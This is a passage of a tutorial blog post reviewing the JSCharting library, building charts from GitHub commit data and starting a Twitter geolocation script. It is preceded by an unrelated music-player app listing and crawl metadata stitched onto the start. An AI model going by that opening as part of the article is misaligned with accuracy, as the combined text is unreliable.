Music - shuffle all your tracks • Genius Drag to Sort Playlist & Play Queue • Headset/Bluetooth support • Play now screen Swipe to change songs • Play songs in shuffle, repeat, loop & order • The best free music offline app and media player Import Videos and Audios: import all your favourite videos and audios from your PC or any other device to your phone but just one tap Nice and Simple User Interface: Enjoy your music with stylish and simple user interface, Music Player is a perfect choice. Easiest player to play music with not too much annoying features. Playlist: Create your own any number of playlist. Playlist can be combine with online music and Default musics Default Music: Play your device music along with online music Share your default music as MP3 file with your friends and family. Enjoy the PLAY.
https://appadvice.com/app/playit-all-in-one-player/1572047553
CC-MAIN-2021-49
refinedweb
463
61.6
Hi, >>>>> "ej" == "eric" <ej at ee.duke.edu> writes: >> Currently, os.py in a package masks the real one from anywhere >> inside the package. This would extend that to anywhere inside >> any nested subpackage. Whether that's a "neat" or a "dirty" >> trick is pretty subjective. The wider the namespace you can >> trample on, the more it tends to be "dirty". ej> Yeah, I guess I come down on the "neat" side in this one. If ej> I have a module or package called 'common' at the top level of ej> a deep hierarchy, I'd like all sub-packages to inherit it. ej> That seems intuitive to me and inline with the concept of a ej> 'package'. Perhaps the hijacking of the Numeric example ej> strikes a nerve, but inheriting the 'common' module shouldn't ej> be so contentious. Also, if someone has the gall to hijack ej> os.py at the top of your package directory structure, it seems ej> very likely you want this new behavior everywhere within your ej> package. I agree on this. Also each package is kind of isolated. Any module like os.py inside a sub package won't affect _every_ other sub package and will only affect packages that are nested inside this particular package. So there is some kind of safety net and its not like sticking everything inside sys.path. :) Also, right now, what prevents someone from sticking an os.py somewhere in sys.path and completely ruining standard behaviour. So, its not asif this new approach to importing package makes things dirty, you can very well do 'bad' things right now. [snip] ej> As for overhead, I thought I'd get a couple more data points ej> from distutils and xml since they are standard packages. The ej> distutils import is pretty much a 0% hit. However, the xml ej> import is *much* slower -- a factor of 3.5. Thats a huge hit ej> and worth complaining about. I don't know if this can be ej> optimized or not. If not, it may be a show stopper, even if ej> the philosophical argument was uncontested. >>>> import my_import import time t1 = time.time();import >>>> xml.sax.saxutils; t2 = time.time();print t2-t1 1.35199999809 >>>> import time t1 = time.time();import xml.sax.saxutils; t2 = >>>> time.time();print t2-t1 0.381000041962 IMHO, this is an unfair/wrong comparison. (0) I suspect that you did not first clean things up by doing a plain import xml.sax.saxutils a few times and then start testing. (1) import itself is implemented in C. my_import is pretty much completely in Python. Here is a fairer comparison (done after a few imports). >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0434629917145 >>> import my_import >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0503059625626 Which is still not bad at all and nothing close to 350% slowdown. But to see if the presently measured slowdown is not the parent lookup we really need to compare things against the modified (to cache failures) knee.py: >>> import knee >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0477709770203 >>> import my_import >>> import time >>> s = time.time (); import xml.sax.saxutils; print time.time()-s 0.0501489639282 Which is really not very bad since its just a 5% slowdown. Here are more tests for scipy: >>> import time >>> s = time.time (); import scipy; print time.time()-s 1.36110007763 >>> import knee, time >>> s = time.time (); import scipy; print time.time()-s 1.48176395893 >>> import my_import, time >>> s = time.time (); import scipy; print time.time()-s 1.5150359869 Which means that doing the parent lookup stuff in this case is really not so bad and the biggest slowdown is mostly thanks to knee being implemented in Python. And there is no question of a 350% slowdown!! :) prabhu
https://mail.python.org/pipermail/python-list/2001-November/096264.html
CC-MAIN-2016-36
refinedweb
654
78.85
3 days, 23 hours ago. I2C read from ticker Hi there, I have a problem. I want to read an I2C sensor periodically with a ticker, but it isn not working. I attached my logic analyser and the first write is working but as soon as the ticker is attached the SCL and SDA pins are just pulled down and there is no clock and nothing happens); my_ticker.attach(&read, 1); } EDIT: Here is the new code, which does not work either: #include "mbed.h" I2C i2c(I2C_SDA,I2C_SCL); DigitalOut pin(PA_5); Ticker my_ticker; // ticker for interrupt void readBNO() { pin = 1; char data[7]; data[0] = 0x10; i2c.write(0x70, data, 1, true); pin = 0; } int main() { my_ticker.attach(&readBNO, 1); while(true) { } } Here is a screenshot from logic of the output pins Thanks for helping Lorenz 2 Answers 3 days, 20 hours ago. I have a suspicion on what's going on but can you try this first and see if I2C works?); while(1){ wait(1);read(); } } Thanks for your answer but I know that the I2C works. I have a logic analyzer hooked up to SCL and SDA and I can see that the first command is working and that the data is correct. When the interrupt is called SCL and SDA both go from high to low, stay that way for 60ms and go up againposted by 15 Feb 2017 Ummm...I did not say I2C doesn't work... I said "see if it works"... I suspect that the timers used for ticker are pending any i2C service. My test would prove that.posted by 15 Feb 2017 3 days, 19 hours ago. Seems you try to read from a device at slaveaddress 0x50 after selecting a specific register (0x51) in the slave's internal registerspace. You skip the stop condition in the register selection phase and then want to use the ticker to repeatedly read from that same registeraddress. In that case the I2C operation in the the ticker interrupt should be a read instead of a write operation and it should use the same slaveaddress. You now have: .. i2c.write(0x70, data, 1, true); .. The incorrect slave address may confuse the slave and hang the I2C bus.. That should probably be .. i2c.read(0x50, data, 1, true); .. Note that this could still cause problems when the slave auto-increments the registeraddress, To make sure everything works as expected first try the complete read operation inside the Ticker. I2C i2c(I2C_SDA,I2C_SCL); Ticker my_ticker; // ticker for interrupt void read() { char data[7]; data[0] = 0x51; i2c.write(0x50, data, 1, true); // Set the registeraddress, repeated start i2c.read(0x50, data, 1); // Read from the register and issue stop condition } int main() { my_ticker.attach(&read, 1); while(1){ wait(1); } } No this is not the problem. There is no slave attached. The problem is that the I2C clock does not start to cycle between high and low, no matter what you try to write to it.posted by 15 Feb 2017 The I2C operations will terminate when there is no ack on the transmitted data. In case of an incorrect address or a slave that is not even attached you will not see any traffic after the address.posted by 16 Feb 2017 I know that. At the first write the address is written an then it terminates because there is no ack but in the ticker the address is not transmitted in the first place so there is nothing a slave could acknowledgeposted by 16 Feb 2017 The aborted write may not end with a stop since that was disabled. Could lead to problem with the I2C engine getting in an undefined state.posted by 16 Feb 2017 I just tested it and it is not the problem. you can see it on the screenshot i just added to the main post.posted by 17 Feb 2017 I did some testing on an F103 and the problem is related to the I2C read inside the Ticker. A call to read inside the mainloop works as expected. The read inside the Ticker callback fails. Bill's assumption that something is wrong with the timers is very likely. It happened somewhere in mbed lib release 133. When you select revision 132 or below it still works as it should. There is a revision note for Rev 133 referring to ''STM32 refactor lp_ticker", that could be a possible cause. This problem needs a bug report on github.posted by 17 Feb 2017 To post an answer, please log in.
https://developer.mbed.org/questions/77029/I2C-read-from-ticker/
CC-MAIN-2017-09
refinedweb
761
73.27
NAME systemctl - Control the systemd system and service manager SYNOPSIS DESCRIPTION systemctl may be used to introspect and control the state of the "systemd" system and service manager. Please refer to systemd(1) for an introduction into the basic concepts and functionality this tool manages. COMMANDS The following commands are understood: Unit Commands (Introspection and Modification) list-units [PATTERN...]. Note that this command does not show unit templates, but only instances of unit templates. Units templates that aren't instantiated are not runnable, and will thus never show up in the output of this command. Specifically this means that foo@.service will never be shown in this list — unless instantiated, e.g. as foo [AT] bar.service. Use list-unit-files (see below) for listing installed unit template files. [AT]-timers [PATTERN...] how long has passed since the timer last ran. UNIT shows the name of the timer ACTIVATES shows the name the service the timer activates when it runs. Also see --all and --state=.. Along with its color, its shape varies according to its state: "inactive" or "maintenance" is a white circle ("○"), "active" is a green dot ("●"), "deactivating" is a white dot, "failed" or "error" is a red cross ("×"), and "reloading" is a green clockwise circle arrow ("↻").. show [PATTERN...|JOB...] internally by the system and service manager. For details about many of these properties, see the documentation of the D-Bus interface backing these properties, see org.freedesktop.systemd1(5). cat PATTERN.... help PATTERN...|PID... Show manual pages for one or more units, if available. If a PID is given, the manual pages for the unit the process belongs to are shown. list-dependencies [UNIT...] Shows units required and wanted by the specified units. This recursively lists units following the Requires=, Requisite=, ConsistsOf=, Wants=, BindsTo= dependencies. If no units are specified, default.target is implied.... Start (activate) one or more units specified on the command line. Note that unit glob patterns expand to.... Stop (deactivate) one or more units specified on the command line.. in the web server, not the apache.service systemd unit file. This command should not be confused with the daemon-reload command. restart PATTERN....)). If a unit name with no extension is given, an extension of ".target" will be assumed. This command is dangerous, since it will immediately stop processes that are not enabled in the new target,. clean PATTERN... Remove the configuration, state, cache, logs or runtime data of the specified units. Use --what= to select which kind of resource to remove. For service units this may be used to remove the directories configured with ConfigurationDirectory=, StateDirectory=, CacheDirectory=, LogsDirectory= and RuntimeDirectory=, see systemd.exec(5) for details. For timer units this may be used to clear out the persistent timestamp data if Persistent= is used and --what=state is selected, see systemd.timer(5). This command only applies to units that use either of these settings. If --what= is not specified, both the cache and runtime data are removed (as these two types of data are generally redundant and reproducible on the next invocation of the unit). freeze PATTERN... Freeze one or more units specified on the command line using cgroup freezer... Thaw (unfreeze) one or more units specified on the command line. This is the inverse operation to the freeze command and resumes the execution of processes in the unit's cgroup., and stored on disk for future boots, unless --runtime is passed, in which case the settings only apply until the next reboot. The syntax of the property assignment follows closely the syntax of assignments in unit files.= bind UNIT PATH [PATH] Bind-mounts a file or directory from the host into the specified unit's mount namespace. The first path argument is the source file or directory on the host, the second path argument is the destination file or directory in the unit's mount namespace. When the latter is omitted, the destination path in the unit's mount namespace units that run within a mount namespace (e.g.: with RootImage=, PrivateMounts=, etc.). This command supports bind-mounting directories, regular files, device nodes, AF_UNIX socket nodes, as well as FIFOs. The bind mount is ephemeral, and it is undone as soon as the current unit process exists. Note that the namespace mentioned here, where the bind mount will be added to, is the one where the main service process runs. Other processes (those exececuted by ExecReload=, ExecStartPre=, etc.) run in distinct namespaces. mount-image UNIT IMAGE [PATH [PARTITION_NAME:MOUNT_OPTIONS]] Mounts an image from the host into the specified unit's mount namespace. The first path argument is the source image on the host, the second path argument is the destination directory in the unit's mount namespace (i.e. inside RootImage=/RootDirectory=). The following argument, if any, is interpreted as a colon-separated tuple of partition name and comma-separated list of mount options for that partition. The format is the same as the service MountImages= setting. When combined with the --read-only switch, a ready-only mount is created. When combined with the --mkdir switch, the destination path is first created before the mount is applied. Note that this option is currently only supported for units that run within a mount namespace (i.e. with RootImage=, PrivateMounts=, etc.). Note that the namespace mentioned here where the image mount will be added to, is the one where the main service process runs. Note that the namespace mentioned here, where the bind mount will be added to, is the one where the main service process runs. Other processes (those exececuted by ExecReload=, ExecStartPre=, etc.) run in distinct namespaces. Example: systemctl mount-image foo.service /tmp/img.raw /var/lib/image root:ro,nosuid systemctl mount-image --mkdir bar.service /tmp/img.raw /var/lib/baz/img service-log-level SERVICE [LEVEL] If the LEVEL argument is not given, print the current log level as reported by service SERVICE. TARGET argument is not given, print the current log target as reported by service SERVICE..). Unlike list-units this command will list template units in addition to explicitly instantiated units. enable UNIT..., [AT]. The file system where the linked unit files are located must be accessible when systemd is started (e.g. anything underneath /home/ or /var/ is not allowed, unless those directories are located on the root file system).. disable UNIT... UNIT.... preset UNIT.... UNIT must be the real unit name, any alias names are ignored silently. For more information on the preset policy format, see systemd.preset(5). preset-all Resets all installed unit files to the defaults configured in the preset policy file (see above). Use --preset-mode= to control whether units shall be enabled and disabled, or only enabled, or only disabled. is-enabled... UNIT.... The file system where the linked unit files are located must be accessible when systemd is started (e.g. anything underneath /home/ or /var/ is not allowed, unless those directories are located on the root file system). revert UNIT... UNIT..., add-requires TARGET UNIT... Adds "Wants=" or "Requires=" dependencies, respectively, to the specified TARGET for one or more units. This command honors --system, --user, --runtime and --global in a way similar to enable. edit UNIT... TARGET. cancel JOB... Cancel one or more jobs specified on the command line by their numeric job IDs. If no job ID is specified, cancel all pending jobs. Environment Commands systemd... Set one or more systemd manager environment variables, as specified on the command line. This command will fail if variable names and values do not conform to the rules listed above. a list of environment variable names is passed, client-side values are then imported into the manager's environment block. If any names are not valid environment variable names or have invalid values according to the rules described above, an error is raised. If no arguments are passed, the entire environment block inherited by the systemctl process is imported. In this mode, any inherited invalid environment variables are quietly ignored. Importing of the full inherited environment block (calling this command without any arguments) is deprecated. A shell will set dozens of variables which only make sense locally and are only meant for processes which are descendants of the shell. Such variables in the global environment block are confusing to other processes. Manager State. log-level [LEVEL] If no argument is given, print the current log level of the manager. If an optional argument LEVEL is provided, then the command changes the current log level of the manager to LEVEL (accepts the same values as --log-level= described in systemd(1)). log-target [TARGET] If no argument is given, print the current log target of the manager. If an optional argument TARGET is provided, then the command changes the current log target of the manager to TARGET (accepts the same values as --log-target=, described in systemd(1)). service-watchdogs [yes|no] If no argument is given, print the current state of service runtime watchdogs of the manager. If an optional boolean argument is provided, then globally enables or disables the service runtime watchdogs (WatchdogSec=) and emergency actions (e.g. OnFailure= or StartLimitAction=); see systemd.service(5). The hardware watchdog is not affected by this setting... poweroff. reboot switch --reboot-argument= is given, it will be passed as the optional argument to the reboot(2) system call. kexec ), UNIT should be the name of the unit file (possibly abbreviated, see above), or the absolute path to the unit file: # systemctl enable foo.service or # systemctl link /path/to/foo.service, most of which are derived or closely match the options described. -P Equivalent to --value --property=, i.e. shows the value of the property without the property name or "=". Note that using -P once will also affect all properties listed with -p/--property=. ). When used with status, show journal messages in full, even if they include unprintable characters or are very long. By default, fields with unprintable characters are abbreviated as "blob data". (Note that the pager may escape unprintable characters again.) . --with-dependencies When used with status, cat, list-units, and list-unit-files, those commands print all specified units and the dependencies of those units. Options --reverse, --after, --before may be used to change what types of dependencies are shown. "=". Also see option -P above. --show-types When showing sockets, show the type of the socket. --job-mode= When queuing a new job, this option controls how to deal with already queued jobs. It takes one of "fail", "replace", "replace-irreversibly", "isolate", "ignore-dependencies", "ignore-requirements", "flush", or "triggering".. "triggering" may only be used with systemctl stop. In this mode, the specified unit and any active units that trigger it are stopped. See the discussion of Triggers= in systemd.unit(5) for more information about triggering units. -T, --show-transaction When enqueuing a unit job (for example as effect of a systemctl start invocation or similar), show brief information about all jobs enqueued, covering both the requested job and any added because of unit dependencies. Note that the output will only include jobs immediately part of the transaction requested. It is possible that service start-up program code run as effect of the enqueued jobs might request further jobs to be pulled in. This means that completion of the listed jobs might ultimately entail more jobs than the listed ones. --fail Shorthand for --job-mode=fail. When used with the kill command, if no units were killed, the operation results in an error. --check-inhibitors= When system shutdown or sleep state is request, this option controls how to deal with inhibitor locks. It takes one of "auto", "yes" or "no". Defaults to "auto", which will behave like "yes" for interactive invocations (i.e. from a TTY) and "no" for non-interactive invocations. "yes" will let the request respect inhibitor locks. "no" will let the request (unless privileged) and a list of active locks is printed. However, if "no" is specified or "auto" is specified on a non-interactive requests, the established locks are ignored and not shown, and the operation attempted anyway, possibly requiring additional privileges. May be overridden by --force. -i Shortcut for --check-inhibitors=no. --dry-run Just print what would be done. Currently supported by verbs halt, poweroff, reboot, kexec, suspend, hibernate, hybrid-sleep, suspend-then-hibernate, default, rescue, emergency, and exit. . The special value "help" will list the known values and the program will exit immediately, and the special value "list" will list known values along with the numerical signal numbers and the program will exit immediately. --what= Select what type of per-unit resources to remove when the clean command is invoked, see below. Takes one of configuration, state, cache, logs, runtime to select the type of resource. This option may be specified more than once, in which case all specified resource types are removed. Also accepts the special value all as a shortcut for specifying all five resource types. If this option is not specified defaults to the combination of cache and runtime, i.e. the two kinds of resources that are generally considered to be redundant and can be reconstructed on next invocation. the specified root path when looking for unit files. If this option is present, systemctl will operate on the file system directly, instead of communicating with the systemd daemon to carry out changes. -, or 0 to disable journal output. Defaults to 10. -o, --output= When used with status, controls the formatting of the journal entries that are shown. For the available choices, see journalctl(1). Defaults to "short". --firmware-setup When used with the reboot command, indicate to the system's firmware to reboot into the firmware setup interface. Note that this functionality is not available on all systems. --boot-loader-menu= When used with the reboot command, indicate to the system's boot loader to show the boot loader menu on the following boot. Takes a time value as parameter — indicating the menu timeout. Pass zero in order to disable the menu timeout. Note that not all boot loaders support this functionality. --boot-loader-entry= When used with the reboot command, indicate to the system's boot loader to boot into a specific boot loader entry on the following boot. Takes a boot loader entry identifier as argument, or "help" in order to list available entries. Note that not all boot loaders support this functionality. --reboot-argument= This switch is used with reboot. The value is architecture and firmware specific. As an example, "recovery" might be used to trigger system recovery, and "fota" might be used to trigger a “firmware over the air” update. --plain When used with list-dependencies, list-units or list-machines, the output is printed as a list instead of a tree, and the bullet circles are omitted. --timestamp= Change the format of printed timestamps. The following values may be used: pretty (this is the default) "Day YYYY-MM-DD HH:MM:SS TZ" us, µs "Day YYYY-MM-DD HH:MM:SS.UUUUUU TZ" utc "Day YYYY-MM-DD HH:MM:SS UTC" us+utc, µs+utc "Day YYYY-MM-DD HH:MM:SS.UUUUUU UTC" --mkdir. --marked Only allowed with reload-or-restart. Enqueues restart jobs for all units that have the "needs-restart" mark, and reload jobs for units that have the "needs-reload" mark. When a unit marked for reload does not support reload, restart will be queued. Those properties can be set using set-property Marks. Unless --no-block is used, systemctl will wait for the queued jobs to finish. --read-only When used with bind, creates a read-only bind mount. . --no-pager Do not pipe output into a pager. --legend=BOOL Enable or disable printing of the legend, i.e. column headers and the footer with hints. The legend is printed by default, unless disabled with --quiet or similar. -h, --help Print a short help text and exit. --version Print a short version string and exit. EXIT STATUS On success, 0 is returned, a non-zero failure code otherwise. systemctl uses the return codes defined by LSB, as defined in LSB 3.0.0 [1] . Table 3. LSB return codes The mapping of LSB service states to systemd unit states is imperfect, so it is better to not rely on those return values but to look for specific unit states and substates instead.. SEE ALSO systemd(1), journalctl(1), loginctl(1), machinectl(1), systemd.unit(5), systemd.resource-control(5), systemd.special(7), wall(1), systemd.preset(5), systemd.generator(7), glob(7) NOTES
https://man.cx/systemctl(1)
CC-MAIN-2022-21
refinedweb
2,759
57.37
I’ve been asked to review the JSCharting enterprise charting library, and given that I’ve recently dabbled in visualizations I felt like this was a great opportunity to further explore them in JavaScript. JSCharting enables you to make visualizations in JavaScript using a declarative interface that renders SVG graphics. JSCharting specializes in rendering all kinds of charts – including geographic representations of data like a “sales by state” chart. Another cool example is this visualization of the average temperature in Chicago plotted over time. For a full list of chart types and examples, you should visit their website – it has a comprehensive selection of charts demonstrating the different features in JSCharting. You might want to check out their release history visualization for a better understanding of the kinds of features they have. In this article we’ll explore the kinds of visualizations that you can perform using JSCharting. Let’s start by installing the library. Getting Started To install JSCharting you’ll need to register for a free trial and then download the development bundle .zip. After extracting it into a bundle directory, you’ll have everything you need to start using the library. As a first example, you could create an HTML page like the one below. Note that the library depends on jQuery. We’ll also add a <div> where we’ll be rendering our first chart, and a <script src='example.js>` where we’ll add our charting code. <div id='chart'></div> <script src='bundle/jsc/jquery-latest.min.js'></script> <script src='bundle/jsc/jscharting.js'></script> <script src='example.js'></script> As for our first steps into the charting world, below you’ll find the code necessary to render our first chart. The targetElement option specifies the HTML id attribute for our container – where JSCharting will append an <svg> element. The series option can be used to indicate point series we want to render. We gave the series a name, and it also takes a collection of points. In this case we have a single point consisting of a date for the horizontal x axis and a floating point number for the y axis. You can specify as many points as your point series needs. Once the options have been configured, you can create the chart by calling new JSC.Chart(options), as seen below. var options = { targetElement: 'chart', series: [{ name: 'Purchases', points: [ [new Date(2010, 0, 1), 29.9] ] }] }; var chart = new JSC.Chart(options); Of course, doing that would just render a chart with a single point on it – not that exciting. Let’s add a few more points, and let’s pull those points from my GitHub account’s public contribution activity. Charting GitHub Commit Activity We’ll be using the brand new fetch API for this one as well. The following piece of code pulls down public events broadcasted by my GitHub account, filters out all non-push events (such as commenting or other interactions with the GitHub UI), it then reduces those events into contribution counts by date, and finally they’re printed to the console. fetch('') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(data => console.log(data)) // { 2015-09-21: 7, 2015-09-19: 1, 2015-09-18: 3 } function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Check out the promisees visualization of that code. If you’re confused about the => notation in the code below, refer to my arrow functions in ES6 article. Now that we have the counts for each date, we should map them into something JSCharting understands – a bi-dimensional [[date, count]] array. We can use Object.keys and .map for that one. fetch('') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(data => console.log(data)) // [[Date(2015-09-21), 7], [Date(2015-09-19), 1], [Date(2015-09-18), 3]] function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Lastly, we actually render the chart. In the code below we’ve barely changed the chart-rendering code we had earlier: instead of displaying a single hard-coded point, we’re now using each data point pulled from GitHub’s API. fetch('') .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(points => { var options = { targetElement: 'chart', series: [{ name: 'GitHub Activity', points: points }] } var chart = new JSC.Chart(options) }) function merge (counts, push) { var date = push.created_at.slice(0, 10) if (date in counts) { counts[date]++ } else { counts[date] = 1 } return counts } Here’s how our chart looks like so far. It represents all three dates with contributions, their dates, and the amounts. It’s nice that we didn’t have to do anything in terms of defining domains for our axes, choosing a color for the plotted line, or anything much other than providing the data points. At this point I feel very lonely in the GitHub contribution planet, though. Adding Contributors to the Chart Let’s add a few more contributors to the graph. In order to do that we have to move our fetch call into a method where we pass in a username and get back a Promise, as seen in the snippet below. I’ve also added one more call to .then where I return the data points along with the user name (this replaces our old 'GitHub Activity' string) Curious about the backticks? Those are ES6 template literals. function pull (username) { var base = '' return fetch(`${base}/users/${username}/events/public`) .then(response => response.json()) .then(events => events .filter(event => event.type === 'PushEvent') .reduce(merge, {}) ) .catch(error => ({})) .then(counts => Object .keys(counts) .map(date => [new Date(date), counts[date]]) ) .then(points => ({ name: '@' + username, points })) } We can now leverage Promise.all to render a few different open-source contributors onto a chart. Promise.all awaits an entire collection of promises and then returns all of their results in an Array object. Promise .all([ pull('bevacqua'), pull('substack'), pull('addyosmani'), pull('sindresorhus') ]) .then(lines => { var options = { targetElement: 'chart', series: lines } var chart = new JSC.Chart(options) }) Surely, we could also use an array of names and map them into promises with pull, for brevity. Promise .all(['bevacqua', 'substack', 'addyosmani', 'sindresorhus'].map(pull)) .then(lines => { var options = { targetElement: 'chart', series: lines } var chart = new JSC.Chart(options) }) That looks a bit better now, we were able to render a bunch of different contributors onto the same chart and we can now quickly compare their output in terms of public GitHub contributions. You have to keep in mind that these charts are based on the commits found in the last thirty public events published on each of these members accounts, and not necessarily all of their recent activity. Let’s go back to the chart found at the beginning. Week Over Week Contribution Area Range Going back to that first area chart I’ve shown, it definitely looks cool, so let’s try and come up with an example that’s similar to that chart. I think a cool visualization might be to plot the contributions on a single repository over time. We’ll be plotting ranges comprised of the days with the least and the most contributions in each given week. In order to do that, we first need to come up with the ranges for each week. GitHub happens to have an API endpoint that gives us exactly what we need, the commit_activity endpoint. It returns the last year of commit activity on any given public repository. You get back commit counts by day, as shown below. [ { "days": [ 0, 3, 26, 20, 39, 1, 0 ], "total": 89, "week": 1336280400 }, ... ] For this one I wanted to plot out the weekly highs and lows in the nodejs/node repository in terms of contributions. First off we’ll be pulling the data from GitHub’s API, using fetch once again. fetch('') .then(response => response.json()) Just like the last time around, a little data massaging is in order. After pulling the weeks from the JSON response, we’ll need to map them into a list of points containing a date on the x axis and then the highest and lowest days on the y axis. Below I’ve used moment to figure out the week from the position of each data point in the response. There’s also the ... spread operator being used for brevity – it’s as if I were doing Math.min.apply(null, week.days). It spreads the values in an array over the parameter list of the method call. fetch('') .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => { // render chart here }) You can install moment via Bower – that’s what I did in my example code – available on GitHub. At this point we have the points needed to render the area chart, and they’re properly formatted into something JSCharting understands: x/ y coordinates. This chart took many more configuration options to get right, so we’ll go over each of them before looking at the full picture. First off, there’s the chart type. There’s an immense number of JSCharting chart types so we can’t possibly cover all of them here, but we’ll try to cover a few. The areaSpline chart type produces charts like the one we saw in the first screenshot at the top of the article. type: 'areaSpline' Remember the legends with the GitHub usernames in the last example? It was kind of awkward that they were completely outside the chart. The following setting moves the legend inside the chart with a padding of 4px. legendPosition: 'CA:4,4' I thought it’d be nice to give the chart a title using the JSCharting API itself, so I did that with the next couple of options. Note how JSCharting provides us with variables such as %min, %max, and %average so that we can print data-based information right on the chart’s title – try this link for a full list of these variables. titlePosition: 'full', titleLabelText: ` Weekly GitHub Contribution Activity on nodejs/node repo. Range: %min to %max commits, Average: %average commits` The x axis needs to be scaled into weeks, as we have a data point for each week, and we could also format the label into something that’s readable but not very verbose – for example, something like Jan 23. xAxis: { formatString: 'MMM dd', scaleIntervalUnit: 'week' } The y axis represents commits. So we label it as such. I’ve also set a lower bound of 0 as negative amounts of commits don’t make sense with our data. yAxis: { labelText: 'Commits', scaleRangeMin: 0 } I also wanted to display a threshold – just like in the screenshot we saw earlier – a subtle area in the chart that indicated periods where commit frequency dwindled into near inactivity. Of course, this just means “at least one day in the week commit frequency was low”, so take that data with a grain of salt. The value option specifies the range where I want to add this “danger zone” area, and I’ve also added a label describing the area and gave it a somewhat transparent yellowish color. yAxis: { markers: [{ value: [0, 5], labelText: 'Infrequent Commits', labelAlign: 'center', color: ['#fcc348', 0.6] }] } Then there’s the tooltips. Tooltips are very important because they give you a ton of context into what the datapoint actually means. Here I went descriptive and explained that for a given week there was a high of y1 commits and a low of y2 commits. You can see how we have access to JSCharting variables here as well. defaultPointTooltip: ` <b>Week of %xValue</b> <br/>High: <b>%yValue Commits</b> <br/>Low: <b>%yStart Commits</b>` Lastly, there’s the series. We’re already familiar with this, so you just need to know I gave it a name and passed in the points we got back from the GitHub API after massaging their data. series: [{ name: 'Daily Contributions', points: points }] The full code for our area range chart ends up looking as shown below. fetch('') .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => { var options = { targetElement: 'chart', type: 'areaSpline', legendPosition: 'CA:4,4', titleLabelText: ` Weekly GitHub Contribution Activity on ${repo} repo. Range: %min to %max commits, Average: %average commits`,: [{ name: 'Daily Contributions', points: points }] } var chart = new JSC.Chart(options) }) And here’s how it’s rendered in the browser. Let’s repeat our brief exercise from earlier and add more area ranges to the chart, so that we can compare contributions made to different repositories and not just nodejs/node. Adding Repositories to the Area Chart Unsurprisingly we’ve already done the bulk of the load. We could start by moving the data-fetching Promise into a pull method. That method will be able to pull any data points we need for any repositories we want. It returns a promise that resolves to the repository name and its data points. function pull (repo) { var base = '' return fetch(`${base}/repos/${repo}/stats/commit_activity`) .then(response => response.json()) .then(weeks => weeks .map((week, i) => ({ x: moment().subtract(52 - i, 'weeks').toDate(), y: [ Math.min(...week.days), Math.max(...week.days) ] })) ) .catch(error => []) .then(points => ({ name: repo, points: points })) } We could also extract the chart-rendering part into another method, named comparisonChart. The big difference here is that instead of rendering a chart with data points for a single repository we’ll take a repositories list and map that into several area range series. As many as the consumer dictates! function comparisonChart (repositories) { var options = { targetElement: 'chart', type: 'areaSpline', legendPosition: 'CA:4,4', titleLabelText: 'Weekly GitHub Contribution Activity Comparison', titlePosition: 'full',: repositories.map(repo => ({ name: `Contributions to ${repo.name}`, points: repo.points })) } var chart = new JSC.Chart(options) } To use these two methods, we just have to map repositories into pull promises and then render the comparisonChart when all of those promises are settled. Promise .all([ 'nodejs/node', 'lodash/lodash', 'facebook/react', 'angular/angular' ].map(pull)) .then(comparisonChart) All of the above ends up producing a chart like the one in the screenshot below. If you ask me, that’s a lot of data density right there! You can use it to quickly compare the contributions over time on each of those repos, and it’s very easy to swap out repositories for your own or any other repositories you want. Naturally, that’s not all you can do with JSCharting. Another interesting feature example might be their automatic scale breaks, where you can have the chart join together two distant parts of a scale when there are no data points in between. In terms of coming up with use cases for this review, though, it might be much more interesting to work with their recently released mapping features – as in, Geography. I figured I’m from Argentina just like the Pope, who is visiting the US this month, so what’s a better excuse to render some data onto a map? Tweets and the Pope I used a Node.js script to pull together a series of geo-located tweets about the Pope in Washington, DC and surrounding areas. Putting that script together was actually the hard part, it turns out. Before showing you the full code listing, – detailing how to pull tweets about the Pope in a particular geocoded area from the Twitter Search API – there’s a few things worth mentioning about the code, so I’ll go bit by bit before showing you the full thing. I decided to use the twit module from npm as it solves authentication through OAuth on my behalf. We can install it via npm i twit on the command line. import Twit from 'twit' I created an application (create your own in here) for my demo and pasted all keys and secrets here. Note that you should never ever do that in a real-world application. You should guard your secrets passionately and fiercely. Maybe in a non-versioned file, an encrypted file only you know how to crack open, or in a secure storage service like Amazon S3. // note: never expose your authentication' }) I pulled the geolocation information from Google Maps just by typing in Washington DC and copying the coordinates from the URL bar. To pull a page of tweets you can use the t client we created earlier. The 500km indicate a proximity radius that we want to allow in our Twitter search query. We’ll get to the pager callback in a minute. var query = 'pope francis washington' var geocode = '38.8993488,-77.0145665,500km' var parameters = { geocode, q: query, count: 100 } t.get('search/tweets', parameters, pager) That would mostly work, except it’s too few tweets. It turns out Twitter doesn’t even reliably yield geolocated tweets when we ask for tweets in a certain geolocation, so we need to filter those out and into a list. function pager (err, payload) { if (err) { done(err) return } tweets.push(...payload.statuses.filter(status => status.geo)) } Since we can’t even reliably get 100 points, we’ll tell Twitter to give us a few pages worth of results, all of which we’ll filter out. To do that we can pull the code from earlier that did t.get('search/tweets', ...) into a more method and call it a bunch of times in a row. if (payload.search_metadata.next_results && pages++ < 10) { more(payload.search_metadata) // get the next page of results } else { done(null, tweets) // enough tweets for us! } We’ll use the search_metadata to figure out the newest tweet our next query can produce, effectively paging. We can use omnibox to transform search_metadata.next_results into a query string hash object. Here’s how the full code ended up looking. function tweetsAboutPope (done) { // note: never expose your application' }) var pages = 0 var query = 'pope francis washington' var geocode = '38.6743001,-76.2242026,500km' // Washington, DC and surrounding areas more() function more (metadata) { var parameters 